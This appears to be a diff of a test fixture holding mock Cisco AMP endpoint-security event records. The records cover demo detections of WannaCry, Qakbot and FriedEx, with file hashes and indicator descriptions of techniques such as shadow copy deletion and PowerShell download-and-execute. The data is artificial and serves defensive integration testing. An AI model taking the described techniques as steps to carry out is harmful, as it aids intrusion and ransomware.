Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete 
pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
